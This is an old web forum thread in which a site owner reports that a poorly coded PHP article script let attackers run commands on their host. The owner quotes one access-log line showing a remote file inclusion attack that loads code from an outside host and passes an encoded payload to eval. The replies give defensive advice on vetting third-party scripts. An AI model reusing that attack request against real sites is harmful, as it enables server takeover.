Forum Moderators: coopster
wondering if someone give me some advice on how to prevent this from happening to my site...
I was running an article script.
Here is a summary of the message from my host:
they noticed a ton of outbound connections from their server to various IP addresses on http proxy ports. This was traced to the my account, and they said this was an example of one of the hacks
81.209.148.205 - - [16/Feb/2006:17:30:41 -0500] "GET
http://www.example.com//index.php?page=http://othersite.host.tldk/settings/config.inc&s=eval%28base64_decode%28%27ICAkRiA9ICRfR
they said whatever software I am using as the index.php for
my site was coded extremely poorly and allows for remote users to run commands on our server via your index.php.
Thanks
ATP
[edited by: jatar_k at 8:51 pm (utc) on Feb. 17, 2006]
[edit reason] no urls or email excerpts thanks [/edit]
You could always write your own code, test it, try to exploit it, do some research on how others exploit code, test again. However, this takes time and it may be more feasible to use code created by someone else. When deciding to use someone elses code, do some research. Is the code being actively developed? Is there a forum for discussing the code? When was the last security update released? How often are security updates released? When you finally decide upon a specific piece of code to use, join all forums and mailing lists that the code maintainers have, so that if a security issue arises, you will know about it and can act accordingly.
What you need is to buy code from people who you can trust absolutely. Trust is the name of the game here. Or pay someone to investigate it.
Send the following email to any potential script's owners:
Dear Sir or Madam,I am considering purchasing $scriptname for use on my website, and have a few security-related questions for you:-
Have you had any reports about security flaws which are not yet resolved?
How have you protected yourself against SQL injection?
Does your script function perfectly with register_globals = off?
Have you sanitised all external data inputs?
Get the answers to these. If they seem good then use the script. If you have an SQL injection or unsanitised data based attack then phone your lawyer - you have, in writing, their assurance that these have been covered.